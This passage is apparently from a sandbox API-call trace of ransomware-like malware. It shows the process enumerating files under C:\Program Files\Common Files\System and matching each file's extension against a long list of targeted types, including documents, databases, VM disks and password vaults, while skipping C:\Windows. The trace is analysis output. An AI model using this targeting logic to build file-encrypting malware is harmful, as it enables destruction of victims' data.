(lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.118] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.118] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msdarem.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" [0040.118] PathFindExtensionW (pszPath="msdarem.dll") returned=".dll" [0040.118] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.118] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.118] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.119] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msdaremr.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" [0040.119] PathFindExtensionW (pszPath="msdaremr.dll") returned=".dll" [0040.119] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.119] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.119] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.119] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msdfmap.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" [0040.119] PathFindExtensionW (pszPath="msdfmap.dll") returned=".dll" [0040.119] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.119] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.119] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.119] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.120] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.120] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\System", pszFile="Ole DB" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB") returned="C:\\Program Files\\Common Files\\System\\Ole DB" [0040.120] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\System\\Ole DB") returned 0x0 [0040.120] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\*") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\*" [0040.120] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.122] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.122] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.122] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="en-US" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US" [0040.122] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 0x0 [0040.122] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*" [0040.122] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.122] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.122] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.123] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", pszFile="msdasqlr.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" [0040.123] PathFindExtensionW (pszPath="msdasqlr.dll.mui") returned=".mui" [0040.123] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.123] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.123] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.123] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", pszFile="oledb32r.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" [0040.123] PathFindExtensionW (pszPath="oledb32r.dll.mui") returned=".mui" [0040.123] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.123] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.123] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.123] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", pszFile="sqloledb.rll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" [0040.123] PathFindExtensionW (pszPath="sqloledb.rll.mui") returned=".mui" [0040.123] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.124] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.124] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.124] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", pszFile="sqlxmlx.rll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" [0040.124] PathFindExtensionW (pszPath="sqlxmlx.rll.mui") returned=".mui" [0040.124] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.124] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.124] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.124] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.124] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.124] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="msdaosp.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaosp.dll" [0040.124] PathFindExtensionW (pszPath="msdaosp.dll") returned=".dll" [0040.124] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.125] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.125] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.125] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="msdaps.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\msdaps.dll" [0040.125] PathFindExtensionW (pszPath="msdaps.dll") returned=".dll" [0040.125] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.125] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.125] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.125] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="msdasql.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasql.dll" [0040.125] PathFindExtensionW (pszPath="msdasql.dll") returned=".dll" [0040.125] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.125] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.125] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.125] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="msdasqlr.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\msdasqlr.dll" [0040.125] PathFindExtensionW (pszPath="msdasqlr.dll") returned=".dll" [0040.126] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.126] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.126] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.126] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="msdatl3.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\msdatl3.dll" [0040.126] PathFindExtensionW (pszPath="msdatl3.dll") returned=".dll" [0040.126] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.126] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.126] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.126] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="msxactps.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" [0040.126] PathFindExtensionW (pszPath="msxactps.dll") returned=".dll" [0040.126] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.126] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.126] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.127] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="oledb32.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" [0040.127] PathFindExtensionW (pszPath="oledb32.dll") returned=".dll" [0040.127] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.127] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.127] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.127] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="oledb32r.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" [0040.127] PathFindExtensionW (pszPath="oledb32r.dll") returned=".dll" [0040.127] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.127] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.127] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.127] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="oledbjvs.inc" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" [0040.127] PathFindExtensionW (pszPath="oledbjvs.inc") returned=".inc" [0040.127] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".inc.") returned 5 [0040.127] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".inc.") returned 0x0 [0040.128] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.128] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="oledbvbs.inc" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" [0040.128] PathFindExtensionW (pszPath="oledbvbs.inc") returned=".inc" [0040.128] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".inc.") returned 5 [0040.128] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".inc.") returned 0x0 [0040.128] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.128] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="sqloledb.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.dll" [0040.128] PathFindExtensionW (pszPath="sqloledb.dll") returned=".dll" [0040.128] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.128] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.128] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.128] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="sqloledb.rll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" [0040.128] PathFindExtensionW (pszPath="sqloledb.rll") returned=".rll" [0040.128] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".rll.") returned 5 [0040.129] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".rll.") returned 0x0 [0040.129] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.129] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="sqlxmlx.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" [0040.129] PathFindExtensionW (pszPath="sqlxmlx.dll") returned=".dll" [0040.129] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.129] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.129] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.129] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\Ole DB", pszFile="sqlxmlx.rll" | out: pszDest="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" [0040.129] PathFindExtensionW (pszPath="sqlxmlx.rll") returned=".rll" [0040.129] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".rll.") returned 5 [0040.129] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".rll.") returned 0x0 [0040.129] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.130] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.130] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.130] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\System", pszFile="wab32.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\wab32.dll") returned="C:\\Program Files\\Common Files\\System\\wab32.dll" [0040.130] PathFindExtensionW (pszPath="wab32.dll") returned=".dll" [0040.130] wsprintfW (in: param_1=0x2e4dc58, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.130] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.130] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.130] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\System", pszFile="wab32res.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\wab32res.dll") returned="C:\\Program Files\\Common Files\\System\\wab32res.dll" [0040.130] PathFindExtensionW (pszPath="wab32res.dll") returned=".dll" [0040.130] 